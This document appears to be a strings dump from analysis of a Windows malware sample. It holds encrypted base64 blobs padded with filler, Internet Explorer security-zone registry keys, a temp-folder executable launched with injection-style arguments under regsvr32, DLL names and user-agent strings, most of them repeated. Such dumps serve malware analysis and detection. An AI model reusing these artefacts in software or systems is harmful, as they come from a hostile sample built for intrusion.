qe1pH4Q6vjT2LIWDeAU0QF7cNTSc9IrXxuiKrH9fzzDBmL0r2uP90MTpzx4Q6QXF6LFGMM4bSQRJvDy82dHpceQb5 wSJiwXfI1q0lw2j7yeKKU4d1S2yu1KSDqXTy9EIbNA OTz83nYnlm92yC4Q C1WaY TFWNwLLReTWs1XYS 5ycpe2nbJMnH2nWskkuEycGRyOKeWv9mBEriqVlrPdTjCXGsosq0/ze tTOFwuJz2YC0fKpts4kJR9uU15hpCl3Ic9igp1oMS77Hpr/6MeMHu7DkBY7jRBBOMa8af3kOwdC7KHIoA3ugO6idmr2mNlnOIPZ02aJF4A7BUmGxq6fAc/d4nsDOKJhYVDSSQ7jFKn0BxkkeEXGn1jlhM30sWUYRiITZB4hz3dELYpaKpOauqQgZJXLMoJUZjswMZcIHw8 hQQZBbCiXHRvYT0LMALC4KzcYhBVimTnaCzF92A/IwjwmuMcLdSrwxeDl hgJ64QRn4shSxTV72EJEeStKbUWop6I3XrGwDJziks02zJZ8Ngv5XQj8/6DVvQGXFx4TWNeBjq bLTDVLKQUg0huyqGeRETme3vgtHptbc3HtKLcy0vfPN7ho3GliJnfIlnwhAqPHR5IA154JiYW0oM7LzXCvf1CKxpj1LiIrZnwB6d7Jtt3Q8QKx 0eOeMKVM0ssWxpfLZL071LCj9dr01FLINneXWUENh HrZMrHiIwMc1UdC1vKZBx pQDZ646bysxGLoBQGMRzGdjCDwvbbfEXBUrd/g9Fb8hisLCdrpwEdRSFKUJPqH3u0UM6aNat6SOaQC2KyCuj XpXuVQl42OBunYjp28FYnjJ69lTqmpbMzQlwbndruPKMFUzTs7exQHCtDnZmeknvkCEDf6KSkltgHq1kAC84KUjHejJtsRDuBx0 zeOZ7k1xdwTTZ6D09GDNmaScqIuJBvxivLT94S5LKC6lFbmV89F32bLDuyMgdZst/wMPHcFbzg05tfs7uTHFvQFFuOLpHnHSgPnuNioE97QtBFTp6b9JZbfpd2gx jCYIjC6 c jSeFFiVxYZXbEZZZwc/YdSdKleWp1mhPeQm3JVaKaTXHwATQyKbAA5StQDJ1vp7z0ktMKi6ccOlyToNIZKAtx2K5VhhYNCQuk3aOczite07juFnr4cqEWU3ExokG73gHNySThVIb7F4aSuWLuvjJBJIPKF40P9iC768a11KJFrEnBjefcP2wz/YSZVEB4nyEQ06n3xYDzUt/F2cZ5JjhDq88rEvlE24 rRGht8HZgCa5XNtR51BNuBt3pp2eW78aCwiOEI8VDbn7AruVqkZrQQyYiz6MehXkTK77WrmjXVq5vzgUt4Jzu0pRfZGETR3S5xfz5uV2giiqXE6lYyjuBM0jm2JNf nUn iN35Go8p0Li5fuLrpjddQ1dFuKdDNclSXqPKGbcZU125ad0veW6dcXfvAw/P9kMO8/TKTtnfOw8XBDk2xHFOeyXOK/91hTRYgWLfAdC40pzwnNwRaWu2Aaw/vVSJQ/gFTtm5GDHCSIcKgmANglVtydNm8YkauqtmguErNundREO/6Xo5XpIF3kajshYV/7KjUgwJi9iqoftmRJ94/Tnr70imCuitzO5r81yZ3k1z4U 9Me8weKT69PB2aJTIMhrak6AV 2frGulcO1ju8IPk7W8QOYSGWq cymI4z/Bz5J1hFhMdrMzlFpBMzPF5zagQCDIFZV1HxA/RIEJeOKSZ4Sh1I 9/BXsFpOpr2zx DNvJXmpvgC81f5ca1ECBLO/o23asth4rsaKfBTvd5V ATraypf 5cH1w0H28a4Eb/Ho1gl2smdg5cfdBCyocaFQDyIhrgvO7l5RCcuG3sdDcbJzIvOHqtH8pP0vLIc1VLyyMD3b7vBzGSOxGaKGHNKEu/tR524QME0URfvXsGZU8fGNDZ3DE10bOQXQowrs34DwRQV3hyjTDDars/0rORfN73HxM NtO/9LTyB1neFGw7bd2xFjJ2 3mCbtmCg8m3ZfOK05dJ4zWtSUplLfpExGp NvDcwcq6kkSmvNjPrOG3lzUOkNU5LFwX fTSCdGTCfQ N7KO1iQp/ daGpiDbXS 1MYRI956xhzL6PchxIYyRYVOWPUSHrfgnlyaWcxAMhaj03mV4zdJncZwfgv/Dp1uMJAS0hikYb4RZOGHA7dU9G9T9SKw3OKguTYyrTdA55njE7WjvmI4MENhf2qDHPZ9g1qUSFArRTPUCG7yzx1NnKVcWcY7HkEV0j 9CGlVGrJ1 MiBpVEqzDY0vUeOH275PySs/rqsXNDJpLbNDmE0lbRtaNaOy3a3Tqdhx7Jx0Z84NQ9dllnjga9w XIiFWm5OwD P3yTbjqWPOTitm6HJkdvvvlBcOQSs8xyA9/Dvi/Uq0 rvcAOzBFRMoXpegqOp4ABA3rVGt6ooxDsMypVtyWhxdVWhkVraQr uMTeCoYUzwKWcOAP1AemeqcpTP6gxooeAaaTiEWs1Zs6 iB9 lIvynIWBmiCIJPTRXStMLo0r/dEUj4CiHg45RQB2syBda9JjdY0XGYeCNCLbz1JIZ27UeD6bi2aM/5n3a9MMny52SDEyjfO7Fm/sgwJu9KyKQtZOsuBOAU3iF4mpGB7NSG9y4I1fUVKO/QPr/Ri5wmz Zni3fuAEWTwd03qfK8ywZK0b5lagpTXuDab20 x86fQueLed2rRyaNQHQ4A/K7LlV/wNztP1gOQWKd/XqmkNNTUA3YqcXgA7 fFh0DdaKIz3ux5YYm6WpoR IjvZI0DudKoBDT5vbcg7awPBaPHmiwNi7krMp/wRhFAQ51N3v214gjeaW1j6bMR3lA9SoI3D7f1UnUxeMVlpAi9NPSkr/bs3ww4vgTkH3mWPh6JMWUXZ9/JW9DUb44EbqU sZnH33VZYhTRXvzPbeM33RlQ5PN4a5junE3q9tDwTu/7TzGARQvjLcA OST6QkmSObIMuhwG29jbvnhbVkBoBF87U3y9At2usdlnDTqn4XpLgEzr7y2hW28IwB1IMTp9Lc6bs/CzxMTIhGomY3XuLHQwzR1JP47OS7oEmIqKqem/ZsWC1L6lxU8Ij7UPvlreS4ivFjOEkMFyOaba3a8HZ73Sz64k5kbCOaBgeIe73I3WYHege7t2AgsSmDfb mNbiqCpwT 8n/rYk/wFRgOhtF96FVrvKvvPQztLJTcWvQXDm8uncg auwcf KcNWpM5EsstUrJCnazVk28hDtvnVNw73zsmW6HORlfumWpVIqHmVaZ3GKzvu2/WkM9D76zHfFGxzSTmu/QY3v1nk3Z38ky 4FH5uyR0svcFUUmMICwF5 PubCdBq1XivsKGdcDKqwIagfL65CWPpHVBYhoPyPi/s1qIx5KPp/huaJWUkExnCC33e3S0XEoYM0ZtV6U08/fgJph0RqHyYg02Xf6Y3oM t5bEe2pKglGlExbApVTV6ZLKYKGPfbJuZQbAXCC5y8kZBk8efHtSk1OJqVXdBdu3xPesAqf5c8O5VK3gsoeZaEF0FCxBKj tz9vYZC02eQe6 suEpXVRAPmlwFByKUJyGIItA9 1hCBMuyNl sEz8p2qAH4aRiN3EeO3FcpPLwI3V4H6WVQOH2cR QoDJqfl1MzjOtbYnwZ2z2o j3EoDrkuN/dNQdwGlWXgYp2Ka4Dokjf N0l9jtdDeqcVIT7UnPxNobPutRirxsSJ2ykiPosbCuSmGJ2luJnNB2f544LQeD6Ywu5gBT7NC0CmN0zdiF//uq1mIzekizAnyOUYWpRppij5I9dhei3EuFxJKPvu9NohC121dVsh5GLiNcJ2rv2cLEjUiCN0mWy5nFaDe9yEG6Q4LUEw3h3spbcwkKgq3InOIXH5xyQL9R8ycznUoXgaMzAr/ISItqIw9JINdKxGL1 qjfEem6MYgVVsr/8choKvCW3007EyRqptoTDlADiu91orLcl0PbNb7BwNmfZYMYrAImr/ByyAPFLZO87xv/oBB pPVyNCJs p1FNOzmfv5NFa1bvC4f37nMbd9Udx/OikdZavj1wdDGzMX6oViwK VhwR r12DcYln6G6K0FiXQ7tHi5yP9RVPmiN76S1Vy2nlwA iOB3Pn9dU98LHhqob7bNx2VH7r 236DG4JEQj2rNOyrvDHeBZILrP8gpgQsyXAK/vkBtS6zefT5U985ibWtURWUNfHZ7CKJTgnao30Yvix7ONG9X55dsRcEJsMjn79ri1ggH4W1QbM5WFZMBPGSQDmCo6BJVEA0zw/H8OzA94G/meiuKtFGBET2kEJBXkiJ/Nj45RwF7GioMHDh2nVKeM9RtLi6QkyJY2F5p6JgfdOCy7Vb0zpCLzR/gTcI/SBE9fJEe2RdzbBEkIiIq/e5XXzdy5VE264JbYDhVUzkYqT5m5RvpQ1WaoYNLOogRS9kKjsthNMNbpWOOQIkjLaVTReY/CY S7dhLpEDz0n8gwdM2U/R8nu lECUYqEY2N5p3IRtfbkQ9BtlwlQBIFOblFccd1kks7s/p1tH9FyODzisTiaABwyIHBYjwJzod99fLPtGtDZ7wcJ 1TEaSyCWhxPcVqtsARsxgh8oGIM6Xyf9znVVg1pA4Ls5zfs/DfcZ7hLlvE6nzJh22z/9mdImznshhlPfIfcQ2rF97V9mikNxuGTNrfqHPJZPeBpwxJV5C918ybmhlPrOMKMJJmJKxJaM1i lyVp78eTRLF72u3n y3dEq5vOTbnCXE4gE61szPbjUc0NMmtPxnVrhoOajBwJyk7ozqJbZgxLPzF1gH0DvcrYPeUs/uFzXDlXwa/qB6C08bQDsH50J6UqQV67oX8HY4h28v49y7cUWUYt3Mcy8NznHD4clKGtsQJPldyCkekfi/tch9lmECxVI197U/93trIQrhvZKJtY c/pZlRliwqVhofXEh6c GUXPX1LEmI6YdIyElqCybGJFGlXYOTqNm3O4kuiUxZqPSmKBJ6QWuFIaJzSyZl Jg6uvi9mooC6CdqR Sx/PpLqV5cD7gnw66FcLDxTKXnvGFig9K/EVh cmYE/SWPl4i C2WAtSKZol6vKAbpi0JDfpAwb9eAx60GySErBYDPFQ9hV3OljxOyq9UBEM7OJk5Aot0tIA1CGT/TCL/Vw1eo6OBnKsvR2JwX5jtOhDXdZhbnLwIkjd8RNGb5Or93MOW7B2hKPfdUco6zV0CD GBCjois1LL6loZ33mdpD8QLjmSEjX0/DL iWQ9IThcbkpRV Z7qGXywNr4r4/WCNuOhUdugAlxgkLBloP2ipBDB7QYyEtUGgH0RAmE9n9dAqB6knCSFBq3L6G2EEv4CWMS6DrR8HgXt1rr10mz9JtQ2PQarG7zMxWyQG21w9uyT7EVBX0nir8Em95NT7X8HStIfGYMPIJ7xRUHkdxTx1pjFxzQWOVJcvKa5w5gpA1Xov1wrHpdWD8VCTFAkBfv6EfxUVSGGb OLa MIsuuFY/WMhOOjwsujPMZPJFSW2Y7j2SkgtkTZ1FeXEraT6BPM7U zzi5szN0vXyzFMvIo5Uu3QUtJltqCVCohBgY7/cZ4po1gxL/va0HsYcxv6YwPJJq231t4rXLJ4hEOJTz6mvJMMrKz YdO2V/8UuI/pTD9KAcgsxdDp3oZfJbpfx6IsM7eT4F4LNHw695TSM/EgyiIV581yI4nPHNJfxYJ3aXrKI/3oIfmjG5gTZoe2McS7IyDT73KBBL wXfPBKnSRgaxj K0wDIqHpjJaK27UUZG3flQM8RX4q6hgjJQAqMhZIVJC0Z 7Dqg W9gui9 BPwTi Bqco9TXX1ju293YfVWajIe0 8BnvnmJTS7gXqFAa1mfLcZdM5cNsSj9nMiIS2FHcOHeeP2JHy5f6msa9r8wDpSmetJ1Guhf/C2rJjqA1EiQOJR4KXy2JsQtn7ahmRbDcY G6YukhUP0gjCjRqtEU8rs2S4RcsoHfAdO3UQGzwcST73Hohg6n6bH5Cu4obOlXvg0rdvbOw c6cCdEDHeWh0CwfWaSI/SslwL70DERLEDhjXDKdOxSgGBeryK0W75m2KDjcseqV9wxpZADM2II2XjrMCEMtQk29iUS9b7S2FBU0ncF3XHjttNqI5R2UimjOo57C2ESUqn3wK/uP490uI0 7Knr4OD5qc95H8/8eJz7CuIEx882f9Yd6goaCtChnBv8rzwUeH86vGTG4bmRKOX5H9ztPQHDO3hox1rmLXrgZTotKRmtyAS7MrB0pjZdQxu3vRyEsyLDy2YBQv5/y6ZSlRTI6oOhJO2C4c0pkOfdLrvRwAm2nHagci47ExA5k0xvoqK8mXydCQkOZGRJHon9SYqoVthUvfRwAxWXA6zllWTNb 8W8aXHc8YGcqpAQxuzLvTQZwW8C3/N DKFK3YyXVo54wu/Oo/LtmaZ0OVNKovH4LoOJSyLuqOmF4da2wdbd77pp2r5XYBc ri7Zsv6i makju6nos7WqQ/Fo9hG2tQGHoHz6srqQ7B0L3IKlvePezzzcwvn6qQE4Z5 yiNA wRJjVJSrGVBploFCMCA7VJYsAOUIr3FkxwmWYd K7d4f8ara5D20P2vzQoSY//YOLNyQWbRdcmie/jm8 tkLoO9qkJ Si4Q/rhOb229XRmnZmkv87KPDRLK5P5Kdl 1Gh0f7yRCGMQWlAnzmIzSWl6ufjKsy4OHw Ibg4fapFDoByZKKUxMyFFp1o2SuA/H6O5bu0GRvqoVpCNbSMRqVB7cRO8wM0/emO7ftHvENtuW9oujk85 Jjhu0zrH6iEIVxZm9cojZMHUd2B WJfdOdPhNO710 x2l8hXOaqLDguLjZsgHlYR0M6IxlfJvivhj5MHOTRT1y4uxyTTlYgZFGyMXDgAKB2jXI3Cty0vZUTp5Q9PNpbLSoZGc/zw4/TpKWXyzfAHlkkibwotw2OYzUOgtbggg4jpmlBoT2JOao1ctkr2d3UBmAy8XpvspvnBX/xvpdRL/1QMys=lRCPASX27nuqqN0rPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD"

c2h3PgXWqt2QzTRrb/AnQFC6SRUgWch7j77TVxtWrXEisi5gWjLIKgQWWPjhp0UgEz/kVUGNipnIPLZxi8BxUOwd9J5DQbsosxVqooPcMxy2MFTKpmT8aROKg4jgPL5ULF6ilWRorquC8m0XR dR8hd6QeMVN1z8qMkD1vqxgm4LrkB3rrUobN/saPP2hYsk6VQTT5huKnOMVL5caR5vadBp7OdRzhgDnQIi0zuYfIv v02VfY9J3rrQjqC1 pFYIFt3Gp4UAQmbDJLGUi8hvJ5jIHnHXh6ZdE G2FTkJ3CI2Lj2wf8fOmqGCNuCUBH6Ec7vvAylDcuOVeqr6H9 GqsS1IfkCCllztP/uhBjWjey5V SSDAqDhRCVH uTCvACRGgad bO9wKfoRWb20kkPK8CJRO3Cb3ZBKGOeh51oRkebuOLldMrwBX33FmSkln88u4JdiIX3EOwtJpJ8fNuFb9sVJKqbY0xHN8Kq1Or8RhXvuFhn9jvExwsg77Nm9pukUDgOKXK2YjwzI43i2jlgqjXRjPGNPPw8yrBpOYbuqtlz4xPvXSChtWkqlonwCNmHPfYIqUJsozXDoUSntJjEjPKcnSYnNd4VI/OTKRZl4s3QZK4AiriXs m2G8zO3JfYHA4Mzloj7x/ZrAhvhzeMKq4FLKRhJG4T2JXyLgwvQjwXdohUQg4iEYHpcny L36V4uUkFcvU1tvpqDtiOQYa70HHcPEJfYLV8Toym38KdYL9IJPqUdop utIX7HhaldlXLQIAz7PWZnlHKctlhe5qmCRh7GYrijRosE0KLIyPrqsKKjC7bEFYXy01KABfO qe1pH4Q6vjT2LIWDeAU0QF7cNTSc9IrXxuiKrH9fzzDBmL0r2uP90MTpzx4Q6QXF6LFGMM4bSQRJvDy82dHpceQb5 wSJiwXfI1q0lw2j7yeKKU4d1S2yu1KSDqXTy9EIbNA OTz83nYnlm92yC4Q C1WaY TFWNwLLReTWs1XYS 5ycpe2nbJMnH2nWskkuEycGRyOKeWv9mBEriqVlrPdTjCXGsosq0/ze tTOFwuJz2YC0fKpts4kJR9uU15hpCl3Ic9igp1oMS77Hpr/6MeMHu7DkBY7jRBBOMa8af3kOwdC7KHIoA3ugO6idmr2mNlnOIPZ02aJF4A7BUmGxq6fAc/d4nsDOKJhYVDSSQ7jFKn0BxkkeEXGn1jlhM30sWUYRiITZB4hz3dELYpaKpOauqQgZJXLMoJUZjswMZcIHw8 hQQZBbCiXHRvYT0LMALC4KzcYhBVimTnaCzF92A/IwjwmuMcLdSrwxeDl hgJ64QRn4shSxTV72EJEeStKbUWop6I3XrGwDJziks02zJZ8Ngv5XQj8/6DVvQGXFx4TWNeBjq bLTDVLKQUg0huyqGeRETme3vgtHptbc3HtKLcy0vfPN7ho3GliJnfIlnwhAqPHR5IA154JiYW0oM7LzXCvf1CKxpj1LiIrZnwB6d7Jtt3Q8QKx 0eOeMKVM0ssWxpfLZL071LCj9dr01FLINneXWUENh HrZMrHiIwMc1UdC1vKZBx pQDZ646bysxGLoBQGMRzGdjCDwvbbfEXBUrd/g9Fb8hisLCdrpwEdRSFKUJPqH3u0UM6aNat6SOaQC2KyCuj XpXuVQl42OBunYjp28FYnjJ69lTqmpbMzQlwbndruPKMFUzTs7exQHCtDnZmeknvkCEDf6KSkltgHq1kAC84KUjHejJtsRDuBx0 zeOZ7k1xdwTTZ6D09GDNmaScqIuJBvxivLT94S5LKC6lFbmV89F32bLDuyMgdZst/wMPHcFbzg05tfs7uTHFvQFFuOLpHnHSgPnuNioE97QtBFTp6b9JZbfpd2gx jCYIjC6 c jSeFFiVxYZXbEZZZwc/YdSdKleWp1mhPeQm3JVaKaTXHwATQyKbAA5StQDJ1vp7z0ktMKi6ccOlyToNIZKAtx2K5VhhYNCQuk3aOczite07juFnr4cqEWU3ExokG73gHNySThVIb7F4aSuWLuvjJBJIPKF40P9iC768a11KJFrEnBjefcP2wz/YSZVEB4nyEQ06n3xYDzUt/F2cZ5JjhDq88rEvlE24 rRGht8HZgCa5XNtR51BNuBt3pp2eW78aCwiOEI8VDbn7AruVqkZrQQyYiz6MehXkTK77WrmjXVq5vzgUt4Jzu0pRfZGETR3S5xfz5uV2giiqXE6lYyjuBM0jm2JNf nUn iN35Go8p0Li5fuLrpjddQ1dFuKdDNclSXqPKGbcZU125ad0veW6dcXfvAw/P9kMO8/TKTtnfOw8XBDk2xHFOeyXOK/91hTRYgWLfAdC40pzwnNwRaWu2Aaw/vVSJQ/gFTtm5GDHCSIcKgmANglVtydNm8YkauqtmguErNundREO/6Xo5XpIF3kajshYV/7KjUgwJi9iqoftmRJ94/Tnr70imCuitzO5r81yZ3k1z4U 9Me8weKT69PB2aJTIMhrak6AV 2frGulcO1ju8IPk7W8QOYSGWq cymI4z/Bz5J1hFhMdrMzlFpBMzPF5zagQCDIFZV1HxA/RIEJeOKSZ4Sh1I 9/BXsFpOpr2zx DNvJXmpvgC81f5ca1ECBLO/o23asth4rsaKfBTvd5V ATraypf 5cH1w0H28a4Eb/Ho1gl2smdg5cfdBCyocaFQDyIhrgvO7l5RCcuG3sdDcbJzIvOHqtH8pP0vLIc1VLyyMD3b7vBzGSOxGaKGHNKEu/tR524QME0URfvXsGZU8fGNDZ3DE10bOQXQowrs34DwRQV3hyjTDDars/0rORfN73HxM NtO/9LTyB1neFGw7bd2xFjJ2 3mCbtmCg8m3ZfOK05dJ4zWtSUplLfpExGp NvDcwcq6kkSmvNjPrOG3lzUOkNU5LFwX fTSCdGTCfQ N7KO1iQp/ daGpiDbXS 1MYRI956xhzL6PchxIYyRYVOWPUSHrfgnlyaWcxAMhaj03mV4zdJncZwfgv/Dp1uMJAS0hikYb4RZOGHA7dU9G9T9SKw3OKguTYyrTdA55njE7WjvmI4MENhf2qDHPZ9g1qUSFArRTPUCG7yzx1NnKVcWcY7HkEV0j 9CGlVGrJ1 MiBpVEqzDY0vUeOH275PySs/rqsXNDJpLbNDmE0lbRtaNaOy3a3Tqdhx7Jx0Z84NQ9dllnjga9w XIiFWm5OwD P3yTbjqWPOTitm6HJkdvvvlBcOQSs8xyA9/Dvi/Uq0 rvcAOzBFRMoXpegqOp4ABA3rVGt6ooxDsMypVtyWhxdVWhkVraQr uMTeCoYUzwKWcOAP1AemeqcpTP6gxooeAaaTiEWs1Zs6 iB9 lIvynIWBmiCIJPTRXStMLo0r/dEUj4CiHg45RQB2syBda9JjdY0XGYeCNCLbz1JIZ27UeD6bi2aM/5n3a9MMny52SDEyjfO7Fm/sgwJu9KyKQtZOsuBOAU3iF4mpGB7NSG9y4I1fUVKO/QPr/Ri5wmz Zni3fuAEWTwd03qfK8ywZK0b5lagpTXuDab20 x86fQueLed2rRyaNQHQ4A/K7LlV/wNztP1gOQWKd/XqmkNNTUA3YqcXgA7 fFh0DdaKIz3ux5YYm6WpoR IjvZI0DudKoBDT5vbcg7awPBaPHmiwNi7krMp/wRhFAQ51N3v214gjeaW1j6bMR3lA9SoI3D7f1UnUxeMVlpAi9NPSkr/bs3ww4vgTkH3mWPh6JMWUXZ9/JW9DUb44EbqU sZnH33VZYhTRXvzPbeM33RlQ5PN4a5junE3q9tDwTu/7TzGARQvjLcA OST6QkmSObIMuhwG29jbvnhbVkBoBF87U3y9At2usdlnDTqn4XpLgEzr7y2hW28IwB1IMTp9Lc6bs/CzxMTIhGomY3XuLHQwzR1JP47OS7oEmIqKqem/ZsWC1L6lxU8Ij7UPvlreS4ivFjOEkMFyOaba3a8HZ73Sz64k5kbCOaBgeIe73I3WYHege7t2AgsSmDfb mNbiqCpwT 8n/rYk/wFRgOhtF96FVrvKvvPQztLJTcWvQXDm8uncg auwcf KcNWpM5EsstUrJCnazVk28hDtvnVNw73zsmW6HORlfumWpVIqHmVaZ3GKzvu2/WkM9D76zHfFGxzSTmu/QY3v1nk3Z38ky 4FH5uyR0svcFUUmMICwF5 PubCdBq1XivsKGdcDKqwIagfL65CWPpHVBYhoPyPi/s1qIx5KPp/huaJWUkExnCC33e3S0XEoYM0ZtV6U08/fgJph0RqHyYg02Xf6Y3oM t5bEe2pKglGlExbApVTV6ZLKYKGPfbJuZQbAXCC5y8kZBk8efHtSk1OJqVXdBdu3xPesAqf5c8O5VK3gsoeZaEF0FCxBKj tz9vYZC02eQe6 suEpXVRAPmlwFByKUJyGIItA9 1hCBMuyNl sEz8p2qAH4aRiN3EeO3FcpPLwI3V4H6WVQOH2cR QoDJqfl1MzjOtbYnwZ2z2o j3EoDrkuN/dNQdwGlWXgYp2Ka4Dokjf N0l9jtdDeqcVIT7UnPxNobPutRirxsSJ2ykiPosbCuSmGJ2luJnNB2f544LQeD6Ywu5gBT7NC0CmN0zdiF//uq1mIzekizAnyOUYWpRppij5I9dhei3EuFxJKPvu9NohC121dVsh5GLiNcJ2rv2cLEjUiCN0mWy5nFaDe9yEG6Q4LUEw3h3spbcwkKgq3InOIXH5xyQL9R8ycznUoXgaMzAr/ISItqIw9JINdKxGL1 qjfEem6MYgVVsr/8choKvCW3007EyRqptoTDlADiu91orLcl0PbNb7BwNmfZYMYrAImr/ByyAPFLZO87xv/oBB pPVyNCJs p1FNOzmfv5NFa1bvC4f37nMbd9Udx/OikdZavj1wdDGzMX6oViwK VhwR r12DcYln6G6K0FiXQ7tHi5yP9RVPmiN76S1Vy2nlwA iOB3Pn9dU98LHhqob7bNx2VH7r 236DG4JEQj2rNOyrvDHeBZILrP8gpgQsyXAK/vkBtS6zefT5U985ibWtURWUNfHZ7CKJTgnao30Yvix7ONG9X55dsRcEJsMjn79ri1ggH4W1QbM5WFZMBPGSQDmCo6BJVEA0zw/H8OzA94G/meiuKtFGBET2kEJBXkiJ/Nj45RwF7GioMHDh2nVKeM9RtLi6QkyJY2F5p6JgfdOCy7Vb0zpCLzR/gTcI/SBE9fJEe2RdzbBEkIiIq/e5XXzdy5VE264JbYDhVUzkYqT5m5RvpQ1WaoYNLOogRS9kKjsthNMNbpWOOQIkjLaVTReY/CY S7dhLpEDz0n8gwdM2U/R8nu lECUYqEY2N5p3IRtfbkQ9BtlwlQBIFOblFccd1kks7s/p1tH9FyODzisTiaABwyIHBYjwJzod99fLPtGtDZ7wcJ 1TEaSyCWhxPcVqtsARsxgh8oGIM6Xyf9znVVg1pA4Ls5zfs/DfcZ7hLlvE6nzJh22z/9mdImznshhlPfIfcQ2rF97V9mikNxuGTNrfqHPJZPeBpwxJV5C918ybmhlPrOMKMJJmJKxJaM1i lyVp78eTRLF72u3n y3dEq5vOTbnCXE4gE61szPbjUc0NMmtPxnVrhoOajBwJyk7ozqJbZgxLPzF1gH0DvcrYPeUs/uFzXDlXwa/qB6C08bQDsH50J6UqQV67oX8HY4h28v49y7cUWUYt3Mcy8NznHD4clKGtsQJPldyCkekfi/tch9lmECxVI197U/93trIQrhvZKJtY c/pZlRliwqVhofXEh6c GUXPX1LEmI6YdIyElqCybGJFGlXYOTqNm3O4kuiUxZqPSmKBJ6QWuFIaJzSyZl Jg6uvi9mooC6CdqR Sx/PpLqV5cD7gnw66FcLDxTKXnvGFig9K/EVh cmYE/SWPl4i C2WAtSKZol6vKAbpi0JDfpAwb9eAx60GySErBYDPFQ9hV3OljxOyq9UBEM7OJk5Aot0tIA1CGT/TCL/Vw1eo6OBnKsvR2JwX5jtOhDXdZhbnLwIkjd8RNGb5Or93MOW7B2hKPfdUco6zV0CD GBCjois1LL6loZ33mdpD8QLjmSEjX0/DL iWQ9IThcbkpRV Z7qGXywNr4r4/WCNuOhUdugAlxgkLBloP2ipBDB7QYyEtUGgH0RAmE9n9dAqB6knCSFBq3L6G2EEv4CWMS6DrR8HgXt1rr10mz9JtQ2PQarG7zMxWyQG21w9uyT7EVBX0nir8Em95NT7X8HStIfGYMPIJ7xRUHkdxTx1pjFxzQWOVJcvKa5w5gpA1Xov1wrHpdWD8VCTFAkBfv6EfxUVSGGb OLa MIsuuFY/WMhOOjwsujPMZPJFSW2Y7j2SkgtkTZ1FeXEraT6BPM7U zzi5szN0vXyzFMvIo5Uu3QUtJltqCVCohBgY7/cZ4po1gxL/va0HsYcxv6YwPJJq231t4rXLJ4hEOJTz6mvJMMrKz YdO2V/8UuI/pTD9KAcgsxdDp3oZfJbpfx6IsM7eT4F4LNHw695TSM/EgyiIV581yI4nPHNJfxYJ3aXrKI/3oIfmjG5gTZoe2McS7IyDT73KBBL wXfPBKnSRgaxj K0wDIqHpjJaK27UUZG3flQM8RX4q6hgjJQAqMhZIVJC0Z 7Dqg W9gui9 BPwTi Bqco9TXX1ju293YfVWajIe0 8BnvnmJTS7gXqFAa1mfLcZdM5cNsSj9nMiIS2FHcOHeeP2JHy5f6msa9r8wDpSmetJ1Guhf/C2rJjqA1EiQOJR4KXy2JsQtn7ahmRbDcY G6YukhUP0gjCjRqtEU8rs2S4RcsoHfAdO3UQGzwcST73Hohg6n6bH5Cu4obOlXvg0rdvbOw c6cCdEDHeWh0CwfWaSI/SslwL70DERLEDhjXDKdOxSgGBeryK0W75m2KDjcseqV9wxpZADM2II2XjrMCEMtQk29iUS9b7S2FBU0ncF3XHjttNqI5R2UimjOo57C2ESUqn3wK/uP490uI0 7Knr4OD5qc95H8/8eJz7CuIEx882f9Yd6goaCtChnBv8rzwUeH86vGTG4bmRKOX5H9ztPQHDO3hox1rmLXrgZTotKRmtyAS7MrB0pjZdQxu3vRyEsyLDy2YBQv5/y6ZSlRTI6oOhJO2C4c0pkOfdLrvRwAm2nHagci47ExA5k0xvoqK8mXydCQkOZGRJHon9SYqoVthUvfRwAxWXA6zllWTNb 8W8aXHc8YGcqpAQxuzLvTQZwW8C3/N DKFK3YyXVo54wu/Oo/LtmaZ0OVNKovH4LoOJSyLuqOmF4da2wdbd77pp2r5XYBc ri7Zsv6i makju6nos7WqQ/Fo9hG2tQGHoHz6srqQ7B0L3IKlvePezzzcwvn6qQE4Z5 yiNA wRJjVJSrGVBploFCMCA7VJYsAOUIr3FkxwmWYd K7d4f8ara5D20P2vzQoSY//YOLNyQWbRdcmie/jm8 tkLoO9qkJ Si4Q/rhOb229XRmnZmkv87KPDRLK5P5Kdl 1Gh0f7yRCGMQWlAnzmIzSWl6ufjKsy4OHw Ibg4fapFDoByZKKUxMyFFp1o2SuA/H6O5bu0GRvqoVpCNbSMRqVB7cRO8wM0/emO7ftHvENtuW9oujk85 Jjhu0zrH6iEIVxZm9cojZMHUd2B WJfdOdPhNO710 x2l8hXOaqLDguLjZsgHlYR0M6IxlfJvivhj5MHOTRT1y4uxyTTlYgZFGyMXDgAKB2jXI3Cty0vZUTp5Q9PNpbLSoZGc/zw4/TpKWXyzfAHlkkibwotw2OYzUOgtbggg4jpmlBoT2JOao1ctkr2d3UBmAy8XpvspvnBX/xvpdRL/1QMys=lRCPASX27nuqqN0rPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD"

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

66006666

66006666

"c:\docume~1\"%CurrentUserName%"\locals~1\temp\tmpf7521b9d\bindata865.exe" path>path inj_ffile>inj_ffile

"c:\docume~1\"%CurrentUserName%"\locals~1\temp\tmpf7521b9d\bindata865.exe" path>path inj_ffile>inj_ffile

regsvr32.exe_3384:

.idata

.idata

.reloc

.reloc

P.rsrc

P.rsrc

Portions Copyright (c) 1983,99 Borland

Portions Copyright (c) 1983,99 Borland

kernel32.dll

kernel32.dll

Software\Microsoft\Windows NT\CurrentVersion

Software\Microsoft\Windows NT\CurrentVersion

wininet.dll

wininet.dll

user32.dll

user32.dll

ntdll.dll

ntdll.dll

Kernel32.dll

Kernel32.dll

URLMON.DLL

URLMON.DLL

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

